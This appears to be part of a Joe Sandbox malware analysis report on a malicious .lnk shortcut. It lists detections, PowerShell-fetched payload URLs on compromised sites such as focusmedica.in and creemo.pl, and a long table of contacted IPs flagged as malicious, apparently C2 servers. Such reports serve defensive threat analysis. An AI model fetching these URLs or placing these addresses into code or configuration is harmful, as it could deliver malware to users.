                  6.2.regsvr32.exe.1380000.0.unpack100%AviraHEUR/AGEN.1215493Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  focusmedica.in13%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://focusmedica.in/fmlib/IxB100%Avira URL Cloudmalware
                  https://138.201.142.73/q0%Avira URL Cloudsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/100%Avira URL Cloudmalware
                  https://creemo.pl/wp-admin/Z0%Avira URL Cloudsafe
                  http://filmmogzivota.rs/SpryAssets/gDR/100%Avira URL Cloudmalware
                  https://contoso.com/0%URL Reputationsafe
                  https://www.pango.co/privacy0%URL Reputationsafe
                  http://colegiounamuno.es/cgi-bin/E/100%Avira URL Cloudmalware
                  http://focusmedica.in/100%Avira URL Cloudmalware
                  https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                  https://138.201.142.73/%0%Avira URL Cloudsafe
                  https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/100%Avira URL Cloudmalware
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://crl.ver)0%Avira URL Cloudsafe
                  https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                  http://focusmedica.in100%Avira URL Cloudmalware
                  https://%s.xboxlive.com0%URL Reputationsafe
                  https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                  http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/100%Avira URL Cloudmalware
                  https://dynamic.t0%URL Reputationsafe
                  https://disneyplus.com/legal.0%URL Reputationsafe
                  http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/100%Avira URL Cloudmalware
                  http://focusmedica.inx0%Avira URL Cloudsafe
                  http://help.disneyplus.com.0%URL Reputationsafe
                  https://%s.dnet.xboxlive.com0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  focusmedica.in
                  		166.62.28.147
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://focusmedica.in/fmlib/IxBpowershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://138.201.142.73/qregsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323148198.0000018977C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327924238.0000018977C4D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://creemo.pl/wp-admin/Zpowershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://filmmogzivota.rs/SpryAssets/gDR/powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.hotspotshield.com/terms/svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.pango.co/privacysvchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://colegiounamuno.es/cgi-bin/E/powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.309161023.000002C320CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.296032360.000002A116C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://focusmedica.in/powershell.exe, 00000002.00000002.301252528.000002A117843000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://138.201.142.73/%regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://go.micropowershell.exe, 00000002.00000002.301712766.000002A117962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000B.00000003.322760702.0000018977C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.328487102.0000018977C6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.ver)svchost.exe, 00000011.00000002.519238319.000001ED94287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446199582.00000278A3CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.426094048.00000278A459B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.426121984.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.427531416.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://focusmedica.inpowershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.301217804.000002A11783A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://%s.xboxlive.comsvchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		low
                                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.hotspotshield.com/svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drtrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://dynamic.tsvchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://disneyplus.com/legal.svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.326048817.0000018977C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drtrue
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://activity.windows.comsvchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://focusmedica.inxpowershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://help.disneyplus.com.svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		low
                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  166.62.28.147
                                                                                                  		focusmedica.inUnited States
                                                                                                  		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                  151.106.112.196
                                                                                                  		unknownGermany
                                                                                                  		61157PLUSSERVER-ASN1DEtrue
                                                                                                  110.232.117.186
                                                                                                  		unknownAustralia
                                                                                                  		56038RACKCORP-APRackCorpAUtrue
                                                                                                  51.254.140.238
                                                                                                  		unknownFrance
                                                                                                  		16276OVHFRtrue
                                                                                                  103.132.242.26
                                                                                                  		unknownIndia
                                                                                                  		45117INPL-IN-APIshansNetworkINtrue
                                                                                                  187.84.80.182
                                                                                                  		unknownBrazil
                                                                                                  		52850OxentenetSolucoesTecnologicasEireliBRtrue
                                                                                                  45.118.115.99
                                                                                                  		unknownIndonesia
                                                                                                  		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                                                                                  134.195.212.50
                                                                                                  		unknownReserved
                                                                                                  		289DNIC-AS-00289UStrue
                                                                                                  172.104.251.154
                                                                                                  		unknownUnited States
                                                                                                  		63949LINODE-APLinodeLLCUStrue
                                                                                                  209.126.98.206
                                                                                                  		unknownUnited States
                                                                                                  		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                                                  1.234.21.73
                                                                                                  		unknownKorea Republic of
                                                                                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                  206.189.28.199
                                                                                                  		unknownUnited States
                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                  167.99.115.35
                                                                                                  		unknownUnited States
                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                  185.8.212.130
                                                                                                  		unknownUzbekistan
                                                                                                  		48979UZINFOCOMUZtrue
                                                                                                  185.4.135.165
                                                                                                  		unknownGreece
                                                                                                  		199246TOPHOSTGRtrue
                                                                                                  197.242.150.244
                                                                                                  		unknownSouth Africa
                                                                                                  		37611AfrihostZAtrue
                                                                                                  45.176.232.124
                                                                                                  		unknownColombia
                                                                                                  		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                                                                  183.111.227.137
                                                                                                  		unknownKorea Republic of
                                                                                                  		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                  51.91.76.89
                                                                                                  		unknownFrance
                                                                                                  		16276OVHFRtrue
                                                                                                  50.30.40.196
                                                                                                  		unknownUnited States
                                                                                                  		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                                                  164.68.99.3
                                                                                                  		unknownGermany
                                                                                                  		51167CONTABODEtrue
                                                                                                  167.172.253.162
                                                                                                  		unknownUnited States
                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                  189.126.111.200
                                                                                                  		unknownBrazil
                                                                                                  		27715LocawebServicosdeInternetSABRtrue
                                                                                                  146.59.226.45
                                                                                                  		unknownNorway
                                                                                                  		16276OVHFRtrue
                                                                                                  58.227.42.236
                                                                                                  		unknownKorea Republic of
                                                                                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                  196.218.30.83
                                                                                                  		unknownEgypt
                                                                                                  		8452TE-ASTE-ASEGtrue
                                                                                                  158.69.222.101
                                                                                                  		unknownCanada
                                                                                                  		16276OVHFRtrue
                                                                                                  159.65.88.10
                                                                                                  		unknownUnited States
                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                  101.50.0.91
                                                                                                  		unknownIndonesia
                                                                                                  		55688BEON-AS-IDPTBeonIntermediaIDtrue
                                                                                                  185.157.82.211
                                                                                                  		unknownPoland
                                                                                                  		42927S-NET-ASPLtrue
                                                                                                  103.43.46.182
                                                                                                  		unknownIndonesia
                                                                                                  		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                                                                                                  104.168.154.79
                                                                                                  		unknownUnited States
                                                                                                  		54290HOSTWINDSUStrue
                                                                                                  212.237.17.99
                                                                                                  		unknownItaly
                                                                                                  		31034ARUBA-ASNITtrue
                                                                                                  212.24.98.99
                                                                                                  		unknownLithuania
                                                                                                  		62282RACKRAYUABRakrejusLTtrue
                                                                                                  201.94.166.162
                                                                                                  		unknownBrazil
                                                                                                  		28573CLAROSABRtrue
                                                                                                  160.16.142.56
                                                                                                  		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                                                  103.75.201.2
                                                                                                  		unknownThailand
                                                                                                  		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                                                  216.158.226.206
                                                                                                  		unknownUnited States
                                                                                                  		19318IS-AS-1UStrue
                                                                                                  91.207.28.33
                                                                                                  		unknownKyrgyzstan
                                                                                                  		39819PROHOSTKGtrue
                                                                                                  51.91.7.5
                                                                                                  		unknownFrance
                                                                                                  		16276OVHFRtrue
                                                                                                  5.9.116.246
                                                                                                  		unknownGermany
                                                                                                  		24940HETZNER-ASDEtrue
                                                                                                  138.201.142.73
                                                                                                  		unknownGermany
                                                                                                  		24940HETZNER-ASDEtrue
                                                                                                  188.44.20.25
                                                                                                  		unknownMacedonia
                                                                                                  		57374GIV-ASMKtrue
                                                                                                  45.235.8.30
                                                                                                  		unknownBrazil
                                                                                                  		267405WIKINETTELECOMUNICACOESBRtrue
                                                                                                  153.126.146.25
                                                                                                  		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                  72.15.201.15
                                                                                                  		unknownUnited States
                                                                                                  		13649ASN-VINSUStrue
                                                                                                  209.250.246.206
                                                                                                  		unknownEuropean Union
                                                                                                  		20473AS-CHOOPAUStrue
                                                                                                  82.165.152.127
                                                                                                  		unknownGermany
                                                                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                  107.182.225.142
                                                                                                  		unknownUnited States
                                                                                                  		32780HOSTINGSERVICES-INCUStrue
                                                                                                  134.122.66.193
                                                                                                  		unknownUnited States
                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                  131.100.24.231
                                                                                                  		unknownBrazil
                                                                                                  		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                                                                                  27.54.89.58
                                                                                                  		unknownAustralia
                                                                                                  		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                  46.55.222.11
                                                                                                  		unknownBulgaria
                                                                                                  		34841BALCHIKNETBGtrue
                                                                                                  173.212.193.249
                                                                                                  		unknownGermany
                                                                                                  		51167CONTABODEtrue
                                                                                                  103.70.28.102
                                                                                                  		unknownViet Nam
                                                                                                  		63761MAXDATA-VNCongtyTNHHDichvutructuyenMaxdataVNtrue
                                                                                                  149.56.131.28
                                                                                                  		unknownCanada
                                                                                                  		16276OVHFRtrue
                                                                                                  176.104.106.96
                                                                                                  		unknownSerbia
                                                                                                  		198371NINETRStrue
                                                                                                  209.97.163.214
                                                                                                  		unknownUnited States
                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                  203.114.109.124
                                                                                                  		unknownThailand
                                                                                                  		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                                                                                  1.234.2.232
                                                                                                  		unknownKorea Republic of
                                                                                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                  138.197.147.101
                                                                                                  		unknownUnited States
                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                  119.193.124.41
                                                                                                  		unknownKorea Republic of
                                                                                                  		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                  129.232.188.93
                                                                                                  		unknownSouth Africa
                                                                                                  		37153xneeloZAtrue
                                                                                                  94.23.45.86
                                                                                                  		unknownFrance
                                                                                                  		16276OVHFRtrue

                                                                                                  Private

                                                                                                  IP
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                  Analysis ID:615497
                                                                                                  Start date and time: 26/04/202209:45:082022-04-26 09:45:08 +02:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 9m 18s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Sample file name:2022-04-26_1045.exe.lnk
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:28
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.winLNK@22/18@1/65
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 50%
                                                                                                  HDC Information:
